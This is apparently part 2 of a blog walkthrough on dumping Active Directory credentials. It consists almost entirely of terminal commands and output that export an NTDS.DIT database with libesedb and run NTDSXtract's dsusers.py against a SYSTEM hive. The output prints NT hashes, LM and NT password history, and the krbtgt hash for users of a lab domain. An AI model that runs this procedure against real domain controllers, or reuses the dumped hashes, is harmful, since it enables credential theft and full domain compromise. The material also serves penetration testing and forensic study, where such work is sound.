Volume Shadow Copy NTDS.DIT Domain Hashes Remotely - Part 2

wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

wget http://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz

tar zxvf libesedb-alpha-20120102.tar.gzunzip ntdsxtract_v1_0.zip

root@wpad:~/blog/# cd libesedb-20120102root@wpad:~/blog/libesedb-20120102# ./configureroot@wpad:~/blog/libesedb-20120102# make

root@wpad:~/blog/libesedb-20120102# cd esedbtools/root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexportesedbexport 20120102Missing source file.Use esedbexport to export items stored in an Extensible Storage Engine (ESE)Database (EDB) fileUsage: esedbexport [ -c codepage ][ -l logfile ][ -m mode ][ -t target ][ -T table_name ][ -hvV ]source source: the source file  -c:     codepage of ASCII strings, options: ascii, windows-874,          windows-932, windows-936, windows-1250, windows-1251,          windows-1252 (default), windows-1253, windows-1254          windows-1255, windows-1256, windows-1257 or windows-1258  -h:     shows this help  -l:     logs information about the exported items  -m:     export mode, option: all, tables (default)'all' exports all the tables or a single specified table with indexes,'tables' exports all the tables or a single specified table  -t:     specify the basename of the target directory to export to(default is the source filename) esedbexport will add the suffix          .export to the basename  -T:     exports only a specific table  -v:     verbose output to stderr  -V:     print versionroot@wpad:~/blog/libesedb-20120102/esedbtools#root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport ../../ntds.ditesedbexport 20120102Opening file.Exporting table 1 (MSysObjects) out of 12.Exporting table 2 (MSysObjectsShadow) out of 12.Exporting table 3 (MSysUnicodeFixupVer2) out of 12.Exporting table 4 (datatable) out of 12.Exporting table 5 (hiddentable) out of 12.Exporting table 6 (link_table) out of 12.Exporting table 7 (sdpropcounttable) out of 12.Exporting table 8 (sdproptable) out of 12.Exporting table 9 (sd_table) out of 12.Exporting table 10 (MSysDefrag2) out of 12.Exporting table 11 (quota_table) out of 12.Exporting table 12 (quota_rebuild_progress_table) out of 12.Export completed.

root@wpad:~/blog/libesedb-20120102/esedbtools#root@wpad:~/blog/libesedb-20120102/esedbtools# mv ntds.dit.export/ ../../

root@wpad:~/blog# cd NTDSXtract 1.0/root@wpad:~/blog/NTDSXtract 1.0# lsdscomputers.py  dsdeletedobjects.py  dsfileinformation.py  dsgroups.py  dstimeline.py  dsusers.py  framework  ntdsroot@wpad:~/blog/NTDSXtract 1.0# python dsusers.pyDSUsersExtracts information related to user objectsusage: dsusers.py   [option]  options:    --rid          List user identified by RID    --name          List user identified by Name    --passwordhashes          Extract password hashes    --passwordhistory          Extract password history    --certificates          Extract certificates    --supplcreds          Extract kerberos keys    --membership          List groups of which the user is a memberroot@wpad:~/blog/NTDSXtract 1.0#

root@wpad:~/blog/NTDSXtract 1.0# python dsusers.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 --passwordhashes ../SYSTEM.hive --passwordhistory ../SYSTEM.hiveRunning with options:  Extracting password hashes  Extracting password historyInitialising engine...Scanning database - 100% -> 3475 records processedExtracting schema information - 100% -> 1549 records processedExtracting object links...List of users:==============Record ID:           3562User name:           AdministratorUser principal name:SAM Account name:    AdministratorSAM Account type:    SAM_NORMAL_USER_ACCOUNTGUID: 7ceee337-fa58-4ca0-9643-540a40161020SID:  S-1-5-21-3825330677-773554443-1603823854-500When created:         2012-08-22 03:12:59When changed:         2013-05-15 04:06:55Account expires:      NeverPassword last set:    2012-08-22 02:49:42.899576Last logon:           2013-05-15 04:08:04.547236Last logon timestamp: 2013-05-15 04:06:55.577353Bad password time     2013-06-07 02:34:34.560516Logon count:          9Bad password count:   1User Account Control:  NORMAL_ACCOUNTAncestors:$ROOT_OBJECT$ net projectmentor Users AdministratorPassword hashes:  Administrator:$NT$88e4d9fabaecf3ded18dd80905521b29:::Password history:Record ID:           3563User name:           GuestUser principal name:SAM Account name:    GuestSAM Account type:    SAM_NORMAL_USER_ACCOUNTGUID: 659723d7-1246-4959-b0fc-af80ea5e3816SID:  S-1-5-21-3825330677-773554443-1603823854-501When created:         2012-08-22 03:12:59When changed:         2013-03-14 06:54:22Account expires:      NeverPassword last set:    2013-03-14 06:54:22.029303Last logon:           2013-03-14 06:54:27.012817Last logon timestamp: 2013-03-14 06:32:41.834022Bad password time     2013-06-07 03:07:46.499917Logon count:          0Bad password count:   10User Account Control:  PWD Not Required  NORMAL_ACCOUNT  PWD Never ExpiresAncestors:$ROOT_OBJECT$ net projectmentor Users GuestPassword hashes:  Guest:$NT$823893adfad2ada6e1a414f3ebdf58f7:::Password history:Record ID:           3564User name:           userUser principal name:SAM Account name:    userSAM Account type:    SAM_NORMAL_USER_ACCOUNTGUID: c5a5c87a-93b4-4d80-97a1-1c605b9b0c03SID:  S-1-5-21-3825330677-773554443-1603823854-1000When created:         2012-08-22 03:12:59When changed:         2013-06-07 02:51:54Account expires:      NeverPassword last set:    2013-03-14 03:25:11.793912Last logon:           2013-06-07 02:51:54.152191Last logon timestamp: 2013-06-07 02:51:54.152191Bad password time     2013-04-19 05:25:40.412670Logon count:          67Bad password count:   0User Account Control:  NORMAL_ACCOUNT  PWD Never ExpiresAncestors:$ROOT_OBJECT$ net projectmentor Users userPassword hashes:  user:$NT$88e4d9fabaecf3dec18dd80905521b29:::Password history:  user_nthistory0:$NT$88e4d9fabafcf3dec18dd80905521b29:::  user_nthistory1:$NT$0c61031f010b2fbb88fe449fbf262477:::  user_nthistory2:$NT$88e4dffabaecf3dec18dd80905521b29:::  user_lmhistory0:c869027e01c3c4fe7626a90c87cc7fed:::  user_lmhistory1:8be023cd858da1edd21b94907afe182c:::Record ID:           3610User name:           krbtgtUser principal name:SAM Account name:    krbtgtSAM Account type:    SAM_NORMAL_USER_ACCOUNTGUID: 74e6bd0b-e4d5-42df-98d5-24f9060061c9SID:  S-1-5-21-3825330677-773554443-1603823854-502When created:         2012-08-22 03:16:03When changed:         2012-08-22 03:31:13Account expires:      NeverPassword last set:    2012-08-22 03:16:03.166457Last logon:           NeverLast logon timestamp: NeverBad password time     NeverLogon count:          0Bad password count:   0User Account Control:  Disabled  NORMAL_ACCOUNTAncestors:$ROOT_OBJECT$ net projectmentor Users krbtgtPassword hashes:  krbtgt:$NT$7253e8647254716b507a2dcb149ff2da:::Password history:  krbtgt_nthistory0:$NT$7253e86a7254716a507a2dcb149ff2da:::  krbtgt_lmhistory0:113926e06a31d182623633041b632929:::Record ID:           3762User name:           John DoeUser principal name: jdoe@projectmentor.netSAM Account name:    jdoeSAM Account type:    SAM_NORMAL_USER_ACCOUNTGUID: bbf24c63-39a9-4cc4-8aa8-933f9ddee940SID:  S-1-5-21-3825330677-773554443-1603823854-1104When created:         2012-08-22 04:10:52When changed:         2013-06-05 13:04:11Account expires:      NeverPassword last set:    2013-04-19 07:11:49.849592Last logon:           2013-06-07 02:56:25.677855Last logon timestamp: 2013-06-05 13:04:11.674344Bad password time     2013-05-02 03:01:12.536251Logon count:          242Bad password count:   0User Account Control:  NORMAL_ACCOUNT  PWD Never ExpiresAncestors:$ROOT_OBJECT$ net projectmentor Users John DoePassword hashes:  John Doe:$NT$88e4d9fabaecf3ded18dd80905511b29:::Password history:Record ID:           3797User name:           Random UserUser principal name: randy@projectmentor.netSAM Account name:    randySAM Account type:    SAM_NORMAL_USER_ACCOUNTGUID: 2701eb29-628a-4568-a093-d33a7db10d04SID:  S-1-5-21-3825330677-773554443-1603823854-1108When created:         2013-04-08 02:34:04When changed:         2013-05-27 16:06:07Account expires:      NeverPassword last set:    2013-04-19 06:59:25.423280Last logon:           2013-04-08 02:34:10.482690Last logon timestamp: 2013-04-08 02:34:10.482690Bad password time     NeverLogon count:          1Bad password count:   0User Account Control:  NORMAL_ACCOUNT  PWD Never ExpiresAncestors:$ROOT_OBJECT$ net projectmentor Users Random UserPassword hashes:  Random User:$NT$88ead9fa5aecf3dec18dd80905521b29:::Password history:root@wpad:~/blog/NTDSXtract 1.0#